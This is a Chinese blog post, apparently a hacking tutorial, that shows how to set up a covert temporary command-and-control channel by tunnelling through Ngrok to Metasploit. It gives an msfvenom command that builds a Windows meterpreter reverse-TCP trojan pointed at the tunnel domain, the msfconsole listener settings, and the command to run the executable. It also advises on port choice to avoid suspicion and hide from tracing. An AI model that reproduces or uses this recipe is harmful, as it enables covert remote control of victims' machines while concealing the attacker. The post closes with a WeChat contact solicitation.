写点什么

牛!大佬都在用。Ngrok + Metasploit = 暂时性隐蔽 C2

用户头像
Thrash
关注
发布于: 2021 年 05 月 21 日
牛!大佬都在用。Ngrok + Metasploit = 暂时性隐蔽C2

Ngrok


Ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。


反向代理在计算机网络中是代理服务器的一种。服务器根据客户端的请求,从其关系的一组或多组后端服务器(如 Web 服务器)上获取资源,然后再将这些资源返回给客户端,客户端只会得知反向代理的 IP 地址,而不知道在代理服务器后面的服务器集群的存在。


通过利用 Ngrok 我们可以使用最少的成本去通过 Metasploit 隐蔽自己,从而达到目标很难追踪到自己。


内网 Kali 通过 Ngrok 穿透反弹 shell 到 Metasploit


具体演示


首先要去下载一个 Ngrok 客户端:https://www.ngrok.cc/download.html



这里主要选择 tcp 隧道,然后本地端口也就是 Kail 要监听的端口,我这里选了 8888 端口(在实际攻击场景中尽量选择一些不让人怀疑的高端口,例如 26458 等等,别设置例如:4444 、5555、6666 这种端口,具体原因不必多说),然后会有一个域名和隧道 ID:




然后在 Kali 上运行 Ngrok:


./sunny clientid 你的隧道id
复制代码




这个时候就做好内网穿透了!因为是通过 Kali 本机的 8888 端口给转发到 Ngrok 的 10073,所以就得生成一个反向,然后端口是 10073 的木马:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxxx.xxxx.com LPORT=10073 -f exe > 8888.exe
复制代码



最后 Kali 打开 MSF 控制台 msfconsole 开启监听(注意这里的端口需要设置为 8888,ip 设置为本地 127.0.0.1 ):




msf > set lhost 127.0.0.1msf > set lport 8888msf > exploit
复制代码


最后运行 8888.exe 成功反弹 Meterpreter 到 Metasploit:



cmd /c start 8888.exe
复制代码




这样就能实现无需公网 VPS 就能反弹 Shell。通过这样的方式能够以最少的成本去隐蔽自己,当然这种方式也不是最有效的隐蔽手段,但是是最快捷的方式,通过 Ngrok 能基本上能满足大部分渗透的需求。

最后:希望大家可以点赞评论加关注,想要获取网络安全的资料的请加 V:gogquick

用户头像

Thrash

关注

还未添加个人签名 2021.04.06 加入

还未添加个人简介

评论

发布
暂无评论
牛!大佬都在用。Ngrok + Metasploit = 暂时性隐蔽C2